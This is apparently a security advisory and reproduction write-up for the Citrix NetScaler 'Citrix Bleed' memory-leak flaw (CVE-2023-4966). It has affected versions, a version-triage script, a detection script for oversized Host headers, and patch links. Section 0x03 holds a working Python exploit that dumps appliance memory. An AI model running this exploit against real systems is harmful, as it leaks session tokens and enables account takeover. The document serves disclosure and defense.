0x00 Preface

This test is for learning purposes only. If it is used for illegal purposes, neither the platform nor the author of this article bears any responsibility; you are liable yourself!

0x01 Vulnerability Overview

Citrix NetScaler Gateway (Citrix Systems Gateway) and Citrix NetScaler ADC are both products of Citrix Systems, a US company. NetScaler Gateway is a secure remote-access solution that gives administrators application-level and data-level control so that users can remotely access applications and data from any location. NetScaler ADC is an application delivery and security platform.

NetScaler ADC and NetScaler Gateway contain a security vulnerability that results in sensitive information disclosure.

0x02 Affected Versions

NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50

NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15

NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19

NetScaler ADC 13.1-FIPS < 13.1-37.164

NetScaler ADC 12.1-FIPS < 12.1-55.300

NetScaler ADC 12.1-NDcPP < 12.1-55.300
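The list above gives, per release branch and edition, the first build that contains the fix. The following version checker is an added example written for this article (it is not Citrix code and not part of the original post): it parses NetScaler build strings, compares them against the fixed builds listed above, and sorts an inventory into affected, fixed and unknown. The build-string layout (major.minor-build.sub) and the edition labels "standard", "fips" and "ndcpp" are this example's own assumptions; the sample inventory is constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed builds per (release branch, edition), copied from the affected-version
# list above. A build on the same branch and edition that sorts below the fixed
# build is affected. The edition labels are this example's own naming, not
# vendor terminology.
FIXED_BUILDS: Dict[Tuple[str, str], str] = {
    ("14.1", "standard"): "14.1-8.50",
    ("13.1", "standard"): "13.1-49.15",
    ("13.0", "standard"): "13.0-92.19",
    ("13.1", "fips"): "13.1-37.164",
    ("12.1", "fips"): "12.1-55.300",
    ("12.1", "ndcpp"): "12.1-55.300",
}

# Assumed build-string layout: <major>.<minor>-<build>.<sub>, e.g. 13.1-48.47
VERSION_RE = re.compile(r"^(\d+)\.(\d+)-(\d+)\.(\d+)$")


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Turn '13.1-48.47' into (13, 1, 48, 47) so builds compare numerically."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised NetScaler build string: {version!r}")
    major, minor, build, sub = (int(x) for x in m.groups())
    return major, minor, build, sub


def is_affected(version: str, edition: str = "standard") -> Optional[bool]:
    """True if the build is below the fixed build for its branch and edition,
    False if it is at or above it, None if the branch/edition is not in the
    table (a branch the list above does not mention)."""
    parsed = parse_version(version)
    branch = f"{parsed[0]}.{parsed[1]}"
    fixed = FIXED_BUILDS.get((branch, edition.lower()))
    if fixed is None:
        return None
    return parsed < parse_version(fixed)


def triage(inventory: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Sort a (hostname, build, edition) inventory into affected / fixed / unknown."""
    result: Dict[str, List[str]] = {"affected": [], "fixed": [], "unknown": []}
    for host, build, edition in inventory:
        verdict = is_affected(build, edition)
        key = "unknown" if verdict is None else ("affected" if verdict else "fixed")
        result[key].append(host)
    return result


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and builds are made up for the demo.
    sample = [
        ("gw-1.example.internal", "13.1-48.47", "standard"),
        ("gw-2.example.internal", "13.1-49.15", "standard"),
        ("adc-fips.example.internal", "13.1-37.150", "fips"),
        ("adc-old.example.internal", "12.0-63.21", "standard"),
    ]
    for bucket, hosts in triage(sample).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

The edition matters: a 13.1 FIPS build is compared against 13.1-37.164, not against the mainline 13.1-49.15, so feeding an inventory without the edition would misclassify FIPS appliances. Branches not in the table come back as "unknown" rather than "fixed", so they still get a human look.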


0x03 Vulnerability Reproduction

1. Access the vulnerable environment


2. Reproduce the vulnerability

POC (GET)

Vulnerability reproduction

GET request: inject the command-execution function and base64-encode it

GET /oauth/idp/.well-known/openid-configuration HTTP/1.1

Host: 127.0.0.1

3. Python script test (vulnerability present)

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse

# The appliance usually presents a self-signed certificate; silence the TLS warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(1)  # usage error: exit non-zero

hostname = args.target

if __name__ == "__main__":
    # Same endpoint as the request in step 2, with an oversized Host header.
    headers = {
        "Host": "a" * 24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration",
                     headers=headers, verify=False, timeout=10)
    if r.status_code == 200:
        # Everything after offset 131050 of the body is printed as the leaked data.
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")
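Both the raw request in step 2 and the script in step 3 share one observable trait: a GET to /oauth/idp/.well-known/openid-configuration whose Host header is far longer than any hostname can be. The following detector is an added example written for this article (not the author's script and not vendor code): it parses an HTTP/1.1 request head and raises an alert when the Host header exceeds the 253-character hostname limit, with higher severity on the endpoint shown above. The sample requests are constructed; the threshold and severity labels are this example's own choices.

```python
from typing import Dict, NamedTuple, Optional

# Endpoint used by the request in step 2 and by the script in step 3.
WATCHED_PATHS = {"/oauth/idp/.well-known/openid-configuration"}
# A DNS hostname is at most 253 characters (RFC 1035); a Host value many times
# longer than that is not something a browser or legitimate client sends.
MAX_HOST_LEN = 253


class RequestHead(NamedTuple):
    method: str
    path: str
    headers: Dict[str, str]


def parse_request_head(raw: str) -> RequestHead:
    """Parse the request line and headers of an HTTP/1.1 request head (body ignored)."""
    lines = raw.replace("\r\n", "\n").lstrip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return RequestHead(method.upper(), target.split("?", 1)[0], headers)


def inspect_request(raw: str) -> Optional[Dict[str, object]]:
    """Return an alert dict for a request that matches the CVE-2023-4966 probe
    pattern (oversized Host header), or None for a normal request."""
    req = parse_request_head(raw)
    host_len = len(req.headers.get("host", ""))
    if host_len <= MAX_HOST_LEN:
        return None
    severity = "high" if req.path in WATCHED_PATHS else "medium"
    return {
        "severity": severity,
        "path": req.path,
        "host_len": host_len,
        "reason": f"Host header is {host_len} bytes (limit {MAX_HOST_LEN})",
    }


# Constructed sample traffic: a normal request (same shape as step 2),
# a probe shaped like the script in step 3, and a long Host on an unrelated
# (made-up) path.
NORMAL = "GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
PROBE = (
    "GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\r\n"
    "Host: " + "a" * 24576 + "\r\n\r\n"
)
OTHER = "GET /some/other/path HTTP/1.1\r\nHost: " + "b" * 600 + "\r\n\r\n"

if __name__ == "__main__":
    for label, raw in (("normal", NORMAL), ("probe", PROBE), ("other", OTHER)):
        print(label, inspect_request(raw))
```

Because the rule fires on the request itself, it works on logs from a reverse proxy or WAF placed in front of the appliance and does not depend on seeing the response; a header-length cap at that layer also blocks the probe before it reaches NetScaler, which is a useful stopgap until the builds listed in 0x02 are installed.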

0x04 Remediation

The vendor has released an upgrade patch that fixes the vulnerability; it can be obtained from:

https://support.citrix.com/article/CTX579459
https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966